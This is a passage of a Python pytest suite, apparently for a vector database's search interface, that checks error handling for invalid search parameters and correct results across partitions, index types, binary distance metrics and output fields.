# 2. search collection without data before load
log.info("test_search_with_empty_collection: Searching empty collection %s"
% collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
err_msg = "collection" + collection_w.name + "was not loaded into memory"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, timeout=1,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
# 3. search collection without data after load
collection_w.load()
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_missing(self):
"""
target: test search with incomplete parameters
method: search with incomplete parameters
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_param_missing")
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search collection with missing parameters
log.info("test_search_param_missing: Searching collection %s "
"with missing parameters" % collection_w.name)
try:
collection_w.search()
except TypeError as e:
assert "missing 4 required positional arguments: 'data', " \
"'anns_field', 'param', and 'limit'" in str(e)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_dim(self):
"""
target: test search with invalid parameter values
method: search with invalid dim
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_param_invalid_dim")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid dim
log.info("test_search_param_invalid_dim: searching with invalid dim")
wrong_dim = 129
vectors = [[random.random() for _ in range(wrong_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The dimension of query entities "
"is different from schema"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_metric_type(self):
"""
target: test search with invalid parameter values
method: search with invalid metric type
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_param_invalid_metric_type")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid metric_type
log.info("test_search_param_invalid_metric_type: searching with invalid metric_type")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
search_params = {"metric_type": "L10", "params": {"nprobe": 10}}
collection_w.search(vectors[:default_nq], default_search_field, search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "metric type not found"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("limit", [0, 16385])
def test_search_param_invalid_limit(self, limit):
"""
target: test search with invalid parameter values
method: search with invalid limit: 0 and maximum
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_param_invalid_limit")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid limit (topK)
log.info("test_search_param_invalid_limit: searching with "
"invalid limit (topK) = %s" % limit)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
err_msg = "limit %d is too large!" % limit
if limit == 0:
err_msg = "`limit` value 0 is illegal"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="issue 6259")
@pytest.mark.parametrize("invalid_search_field",
["", " ", "float-vector"])
def test_search_param_invalid_field(self, invalid_search_field):
"""
target: test search with invalid parameter values
method: search with invalid field
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_param_invalid_field")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid field
log.info("test_search_param_invalid_field: searching with "
"invalid field: %s" % invalid_search_field)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "invalid search field"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("invalid_search_expr",
[" ", "int63 >= 0"])
def test_search_param_invalid_expr(self, invalid_search_expr):
"""
target: test search with invalid parameter values
method: search with invalid search expressions
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_param_invalid_expr")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2 search with invalid expr
log.info("test_search_param_invalid_expr: searching with "
"invalid expr: %s" % invalid_search_expr)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "invalid expression %s"
% invalid_search_expr})
@pytest.mark.tags(CaseLabel.L1)
def test_search_partition_deleted(self):
"""
target: test search deleted partition
method: 1. search the collection
2. delete a partition
3. search the deleted partition
expected: raise exception and report the error
"""
log.info("test_search_partition_deleted: test search after partition deletion")
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 1000, partition_num)[0]
# 2. delete partitions
log.info("test_search_partition_deleted: deleting a partition")
par = collection_w.partitions
deleted_par_name = par[partition_num].name
collection_w.drop_partition(deleted_par_name)
log.info("test_search_partition_deleted: deleted a partition")
collection_w.load()
# 3. search after delete partitions
log.info("test_search_partition_deleted: searching deleted partition")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
[deleted_par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % deleted_par_name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_partition_not_existed(self):
"""
target: test search not existed partition
method: search with not existed partition
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_index_partition_not_existed")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search the non exist partition
partition_name = "search_non-exist"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, [partition_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % partition_name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_binary(self):
"""
target: test search within binary data (invalid parameter)
method: search with wrong metric type
expected: raise exception and report the error
"""
log.info("test_search_param_invalid_binary: test invalid paramter with binary data")
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
# 3. search with exception
binary_vectors = cf.gen_binary_vectors(3000, default_dim)[1]
wrong_search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector", wrong_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "unsupported"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_binary_flat_with_L2(self):
"""
target: search binary collection using FlAT with L2
method: search binary collection using FLAT with L2
expected: raise exception and report error
"""
log.info("Test case of search interface: test_search_binary_flat_with_L2")
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. search and assert
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, default_dim)
search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search failed"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_output_field_vector(self):
"""
target: test search with vector as output field
method: search with one vector output_field
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_output_field_vector")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=[default_search_field],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search doesn't support "
"vector field as output_fields"})
"""
******************************************************************
# The following are valid base cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_search_normal(self):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: search successfully with limit(topK)
"""
log.info("Test case of search interface: test_search_normal")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_vectors(self):
"""
target: test search with empty query vector
method: search using empty query vector
expected: search successfully with 0 results
"""
log.info("Test case of search interface: test_search_with_empty_vectors")
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search collection without data
log.info("test_search_with_empty_vectors: Searching collection %s "
"using empty vector" % collection_w.name)
collection_w.search([], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": 0})
@pytest.mark.tags(CaseLabel.L1)
def test_search_before_after_delete(self):
"""
target: test search function before and after deletion
method: 1. search the collection
2. delete a partition
3. search the collection
expected: the deleted entities should not be searched
"""
log.info("test_search_before_after_delete: test search after deleting entities")
# 1. initialize with data
partition_num = 1
nb = 1000
limit = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb, partition_num)
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
log.info("test_search_before_after_delete: searching before deleting partitions")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
# 3. delete partitions
log.info("test_search_before_after_delete: deleting a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
collection_w.drop_partition(par[partition_num].name)
log.info("test_search_before_after_delete: deleted a partition")
collection_w.load()
# 4. search non-deleted part after delete partitions
log.info("test_search_before_after_delete: searching after deleting partitions")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[:entity_num],
"limit": limit-deleted_entity_num})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_one(self):
"""
target: test search function before and after release
method: 1. search the collection
2. release a partition
3. search the collection
expected: the deleted entities should not be searched
"""
log.info("test_search_partition_after_release_one: test search after releasing entities")
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb, partition_num)
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
log.info("test_search_partition_after_release_one: searching before deleting partitions")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
# 3. release one partition
log.info("test_search_partition_after_release_one: releasing a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[partition_num].name])
log.info("test_search_partition_after_release_one: released a partition")
# 4. search collection after release one partition
log.info("test_search_partition_after_release_one: searching after deleting partitions")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_all(self):
"""
target: test search function before and after release
method: 1. search the collection
2. release a partition
3. search the collection
expected: the deleted entities should not be searched
"""
log.info("test_search_before_after_release: test search after releasing entities")
# 1. initialize with data
nb = 1000
limit = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb, 1)
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
log.info("test_search_partition_after_release_all: searching before deleting partitions")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
# 3. release all partitions
log.info("test_search_partition_after_release_all: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[0].name, par[1].name])
log.info("test_search_partition_after_release_all: released a partition")
# 4. search collection after release all partitions
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_after_release_load(self):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release collection
3. load collection
4. search the pre-released collection
expected: search successfully
"""
log.info("Test case of search interface: test_search_collection_after_release_load")
# 1. initialize without data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, default_nb, 1)
# 2. release collection
collection_w.release()
# 3. Search the pre-released collection after load
collection_w.load()
log.info("test_search_partition_after_release_load: searching after load")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_load(self):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release a partition
3. load partition
3. search the pre-released partition
expected: search successfully
"""
log.info("Test case of search interface: test_search_partition_after_release_load")
# 1. initialize without data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, default_nb, 1)
# 2. release collection
log.info("test_search_partition_after_release_load: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[1].name])
log.info("test_search_partition_after_release_load: released a partition")
# 3. Search the collection after load
limit = 1000
collection_w.load()
log.info("test_search_partition_after_release_load: searching after load")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
# 4. Search the pre-released partition after load
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
[par[1].name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[par[0].num_entities:],
"limit": par[1].num_entities})
@pytest.mark.tags(CaseLabel.L2)
def test_search_load_flush_load(self):
"""
target: test search when load before flush
method: 1. search the collection
2. insert data and load
3. flush, and load
expected: search success with limit(topK)
"""
log.info("test_search_load_flush_load: search new data without another load")
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. insert data
insert_ids = cf.insert_data(collection_w, default_nb)[3]
# 3. load data
collection_w.load()
# 4. flush and load
collection_w.partitions
collection_w.load()
# 5. search for new data without load
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="issue 5858")
def test_search_new_data(self):
"""
target: test search new inserted data without load
method: 1. search the collection
2. insert new data
3. search the collection without load again
expected: new data should be searched
"""
log.info("test_search_new_data: search new data without another load")
# 1. initialize with data
limit = 1000
nb_old = 500
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb_old)
# 2. search for original data after load
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
log.info("test_search_new_data: searching for original data after load")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": nb_old})
# 3. insert new data
nb_new = 300
insert_ids_new = cf.insert_data(collection_w, nb_new)[3]
insert_ids.extend(insert_ids_new)
# 4. search for new data without load
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": nb_old+nb_new})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_different_index(self, index, params):
"""
target: test search with different index
method: test search with different index
expected: searched successfully
"""
log.info("Test case of search interface: test_search_after_different_index")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, partition_num=1)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create different index
log.info("test_search_after_different_index: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_after_different_index: Created index-%s" % index)
# 3. search
log.info("test_search_after_different_index: Searching after creating index-%s" % index)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_index_different_metric_type(self, index, params):
"""
target: test search with different metric type
method: test search with different metric type
expected: searched successfully
"""
log.info("Test case of search interface: test_search_after_index_different_metric_type")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, partition_num=1)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create different index
log.info("test_search_after_different_index: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "IP"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_after_different_index: Created index-%s" % index)
# 3. search
log.info("test_search_after_different_index: Searching after creating index-%s" % index)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_collection_multiple_times(self):
"""
target: test search for multiple times
method: search for multiple times
expected: searched successfully
"""
log.info("Test case of search interface: test_search_collection_multiple_times")
# 1. initialize with data
search_num = 5
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search for multiple times
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
for i in range(search_num):
log.info("test_search_collection_multiple_times: searching round %d" % (i+1))
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_one_partition(self):
"""
target: test search from partition
method: search from one partition
expected: searched successfully
"""
log.info("Test case of search interface: test_search_index_one_partition")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, partition_num=1)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search in one partition
log.info("test_search_index_one_partition: searching (1000 entities) through one partition")
limit = 1000
par = collection_w.partitions
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
[par[1].name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[par[0].num_entities:],
"limit": par[1].num_entities})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_partitions(self):
"""
target: test search from partitions
method: search from one partitions
expected: searched successfully
"""
log.info("Test case of search interface: test_search_index_partitions")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, partition_num=1)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search through partitions
log.info("test_search_index_partitions: searching (1000 entities) through partitions")
par = collection_w.partitions
log.info("test_search_index_partitions: partitions: %s" % par)
limit = 1000
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
[par[0].name, par[1].name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_names",
[["(.*)"], ["search(.*)"]])
def test_search_index_partitions_fuzzy(self, partition_names):
"""
target: test search from partitions
method: search from partitions with fuzzy
partition name
expected: searched successfully
"""
log.info("Test case of search interface: test_search_index_partitions_fuzzy")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, partition_num=1)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search through partitions
log.info("test_search_index_partitions_fuzzy: searching through partitions")
limit = 1000
nb = default_nb
par = collection_w.partitions
if partition_names == ["search(.*)"]:
insert_ids = insert_ids[par[0].num_entities:]
limit = par[1].num_entities
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
partition_names,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partition_empty(self):
"""
target: test search the empty partition
method: search from the empty partition
expected: searched successfully with 0 results
"""
log.info("Test case of search interface: test_search_index_partition_empty")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create empty partition
partition_name = "search_partition_empty"
collection_w.create_partition(partition_name=partition_name, description="search partition empty")
par = collection_w.partitions
log.info("test_search_index_partition_empty: partitions: %s" % par)
collection_w.load()
# 3. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 4. search the empty partition
log.info("test_search_index_partition_empty: searching %s entities through empty partition" % default_limit)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, [partition_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_jaccard_flat_index(self):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
"""
log.info("Test case of search interface: test_search_binary_jaccard_flat_index")
# 1. initialize with binary data
collection_w, _, binary_raw_vector, _ = \
self.init_collection_general(prefix, True, 2, is_binary=True)
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, default_dim)
distance_0 = cf.jaccard(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.jaccard(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0")[0]
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_hamming_flat_index(self):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
"""
log.info("Test case of search interface: test_search_binary_hamming_flat_index")
# 1. initialize with binary data
collection_w, _, binary_raw_vector, _ = \
self.init_collection_general(prefix, True, 2, is_binary=True)
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "HAMMING"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, default_dim)
distance_0 = cf.hamming(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.hamming(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "HAMMING", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0")[0]
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_tanimoto_flat_index(self):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, _ = \
self.init_collection_general(prefix, True, 2, is_binary=True)
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "TANIMOTO"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, default_dim)
distance_0 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "TANIMOTO", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0")[0]
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("expression, limit",
zip(cf.gen_normal_expressions(),
[1000, 999, 898, 997, 2, 3]))
def test_search_with_expression(self, expression, limit):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
log.info("Test case of search interface: test_search_with_expression")
# 1. initialize with data
nb = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
# 3. search with different expressions
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_fields_empty(self):
"""
target: test search with output fields
method: search with empty output_field
expected: search success
"""
log.info("Test case of search interface: test_search_with_output_fields_empty")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search
log.info("test_search_with_output_fields_empty: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=[],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})[0]
assert len(res[0][0].entity._row_data) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_fields_not_exist(self):
"""
target: test search with output fields
method: search with non-exist output_field
expected: search success
"""
log.info("Test case of search interface: test_search_with_output_fields_not_exist")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search
log.info("test_search_with_output_fields_not_exist: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=["int63"],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: 'Field int63 not exist'})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_field(self):
"""
target: test search with output fields
method: search with one output_field
expected: search success
"""
log.info("Test case of search interface: test_search_with_output_field")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search
log.info("test_search_with_output_field: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=[default_int64_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})[0]
assert len(res[0][0].entity._row_data) != 0
assert default_int64_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields(self):
"""
target: test search with output fields
method: search with multiple output_field
expected: search success
"""
log.info("Test case of search interface: test_search_with_output_fields")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, is_all_data_type=True)
# 2. search
log.info("test_search_with_output_fields: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
